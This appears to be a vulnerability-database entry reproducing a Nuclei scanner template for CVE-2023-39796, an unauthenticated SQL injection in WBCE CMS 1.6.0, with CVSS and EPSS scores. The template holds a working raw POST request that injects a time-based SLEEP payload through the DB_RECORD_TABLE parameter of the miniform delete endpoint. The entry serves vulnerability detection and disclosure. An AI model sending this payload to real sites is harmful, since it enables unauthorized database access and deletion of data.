Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-39796
HistoryNov 21, 2023 - 6:27 a.m.

WBCE 1.6.0 - SQL Injection

2023-11-2106:27:23
ProjectDiscovery
github.com
11
wbce_cms
sqli
cvss-9.8
cwe-89
intrusive

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.051 Low

EPSS

Percentile

93.0%

There is an sql injection vulnerability in "miniform module" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file "/modules/miniform/ajax_delete_message.php" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.
id: CVE-2023-39796

info:
  name: WBCE 1.6.0 - SQL Injection
  author: youngpope
  severity: critical
  description: |
    There is an sql injection vulnerability in "miniform module" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file "/modules/miniform/ajax_delete_message.php" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.
  remediation: Fixed in version 1.6.1
  reference:
    - https://forum.wbce.org/viewtopic.php?pid=42046#p42046
    - https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
    - https://pastebin.com/PBw5AvGp
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39796
    cwe-id: CWE-89
    epss-score: 0.05018
    epss-percentile: 0.92857
    cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wbce
    product: wbce_cms
  tags: cve,cve2023,sqli,wbce,intrusive

http:
  - raw:
      - |
        @timeout: 20s
        POST /modules/miniform/ajax_delete_message.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_1 == 200'
          - 'contains(body, "Record deleted successfully!")'
        condition: and
# digest: 4a0a00473045022100ce40215e4d2fba5acf81c684dc93363c17955c178d0dc4777c89c2472b627950022001713b9c40f260396785c78a21cc5a79ea88f38878a20155889a29ca0db1f63f:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.051 Low

EPSS

Percentile

93.0%